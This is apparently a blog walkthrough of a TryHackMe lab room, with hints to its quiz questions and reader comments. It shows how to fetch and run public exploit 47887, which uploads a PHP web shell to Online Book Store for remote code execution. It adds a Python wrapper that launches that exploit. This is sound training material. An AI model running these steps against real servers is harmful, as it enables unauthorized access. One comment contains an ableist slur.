The Exploit Vulnerabilities (CMNatic Bookstore) room is the second in a series of three by cmnatic (https://tryhackme.com/p/cmnatic) that teaches software vulnerabilities. The first four tasks are theory questions; the last task involves manual exploitation of a vulnerable machine.
The room is available at https://tryhackme.com/room/exploitingavulnerabilityv2
Question 1: Start the machine
Question 2: Would you use an automated scanner? (Yay/Nay)
Question 2 Answer: Hint – Which is faster
Question 3: What vulnerability is this?
Question 3 Answer: Hint – You would need to input harmful code.
Question 4: You manage to impersonate another user. What vulnerability is this?
Question 4 Answer: Hint – Look at the table of different vulnerabilities.
Question 5: What website would you use as a security researcher if you wanted to upload a Proof of Concept?
Question 5 Answer: Hint – Very popular code hosting site owned by Microsoft
Question 6: You are performing a penetration test at a site with no internet connection. What tool could you use to find exploits to use?
Question 6 Answer: Hint – offline tool installed on Kali Linux
Question 7: What type of vulnerability was used in this attack?
Question 7 Answer: Hint – Acronym is RCE
Question 8: Find out the version of the application that is running. What are the name and version number of the application?
Question 8 Answer: Hint – Look at the bottom right-hand side of the page
Question 9: Use this exploit against the vulnerable machine. What is the value of the flag located in a web directory?
This is where the theory stops and the practical begins.
Run the following command:
searchsploit Online Book Store
Or you can use Exploit Database (https://www.exploit-db.com) and search for Online Book Store. Several results come back; the one you want is the Unauthenticated Remote Code Execution exploit (EDB-ID 47887, the script used below).
Download or copy the Python file to your home directory, then run the following command:
python3 47887.py http://x.x.x.x/
Replace x.x.x.x with the IP address of the target machine, and keep the http:// prefix: the script builds its request URLs by appending paths to this argument, and requests refuses a target that has no scheme.
Answer y when the script asks "Do you wish to launch a shell here?".
The exploit then drops you into a shell on the target.
Change directory to /var/www/html/bootstrap/img, list it to find flag.txt, and view the file. If the shell does not keep a cd between commands, use the full path to flag.txt instead. Paste the contents into the last question and you are done.
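As an added example (not part of the original post, and not the exploit's own code), here is a small pre-flight wrapper that normalizes the target argument before handing it to the downloaded script. The exploit builds its request URLs by concatenation (url + '/admin_add.php'), so a target typed as a bare IP makes requests raise MissingSchema; the wrapper adds the scheme when it is missing, rejects anything other than http/https, and strips a trailing slash so the concatenation does not produce a double slash. The exploit file name and location (./47887.py) and the helper names are assumptions.

```python
#!/usr/bin/env python3
"""Pre-flight wrapper for a downloaded exploit script (here EDB-ID 47887,
Online Book Store 1.0 unauthenticated RCE).

Added example, not part of the original post and not the exploit's own
code. The exploit concatenates its endpoints onto the argument you pass
(url + '/admin_add.php'), so a target given as a bare IP makes requests
raise MissingSchema. This wrapper turns whatever the operator typed into
a clean 'http://host[:port][/subpath]' before the script ever sees it.
The exploit file name and location (./47887.py) are an assumption.
"""
import subprocess
import sys
from urllib.parse import urlsplit, urlunsplit


class TargetError(ValueError):
    """The supplied target cannot be turned into a usable base URL."""


def normalize_target(raw: str, default_scheme: str = "http") -> str:
    """Return 'scheme://host[:port][/subpath]' with no trailing slash."""
    raw = raw.strip()
    if not raw:
        raise TargetError("empty target")
    # Without a scheme, urlsplit("10.10.51.246/") treats the host as the
    # *path*, which is exactly why requests reports 'No schema supplied'.
    parts = urlsplit(raw if "://" in raw else f"{default_scheme}://{raw}")
    if parts.scheme not in ("http", "https"):
        raise TargetError(f"unsupported scheme: {parts.scheme!r}")
    if not parts.hostname:
        raise TargetError(f"no host in target: {raw!r}")
    # Keep a sub-path the app may be mounted under, but drop the trailing
    # slash so url + '/admin_add.php' does not become '//admin_add.php'.
    path = parts.path.rstrip("/")
    return urlunsplit((parts.scheme, parts.netloc, path, "", ""))


def is_usable_target(raw: str) -> bool:
    """True if normalize_target() accepts the value."""
    try:
        normalize_target(raw)
    except TargetError:
        return False
    return True


def exploit_endpoint(target: str) -> str:
    """The URL the 47887 script will POST its web shell to."""
    return normalize_target(target) + "/admin_add.php"


def main(argv):
    if len(argv) != 2:
        print(f"usage: {argv[0]} <target>", file=sys.stderr)
        return 2
    try:
        target = normalize_target(argv[1])
    except TargetError as exc:
        print(f"[!] {exc}", file=sys.stderr)
        return 1
    print(f"[*] target normalized to {target}")
    print(f"[*] exploit will upload via {exploit_endpoint(target)}")
    # Hand the cleaned base URL to the downloaded exploit (path assumed).
    return subprocess.call([sys.executable, "47887.py", target])


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as python3 wrapper.py 10.10.51.246 (or with an explicit http://host:port/subpath if the app is not at the web root); the printed endpoint lets you confirm the URL the exploit will hit before any request is sent.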
Hello, I tried that but I got this error and I can't solve the room. Can you help me please?
python 47887.py 10.10.51.246
> Attempting to upload PHP web shell...
Traceback (most recent call last):
  File "47887.py", line 28, in
    r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
  File "/usr/lib/python3/dist-packages/requests/api.py", line 112, in post
    return request('post', url, data=data, json=json, **kwargs)
  File "/usr/lib/python3/dist-packages/requests/api.py", line 58, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/lib/python3/dist-packages/requests/sessions.py", line 506, in request
    prep = self.prepare_request(req)
  File "/usr/lib/python3/dist-packages/requests/sessions.py", line 449, in prepare_request
    hooks=merge_hooks(request.hooks, self.hooks),
  File "/usr/lib/python3/dist-packages/requests/models.py", line 305, in prepare
    self.prepare_url(url, params)
  File "/usr/lib/python3/dist-packages/requests/models.py", line 379, in prepare_url
    raise MissingSchema(error)
requests.exceptions.MissingSchema: Invalid URL '10.10.51.246/admin_add.php': No schema supplied. Perhaps you meant http://10.10.51.246/admin_add.php?
No need for help, I am retarded, I didn't use the http:// LMAO sorry
How did you solve the last challenge? I get an error from the exploit .py file. Can you post the solution on this blog?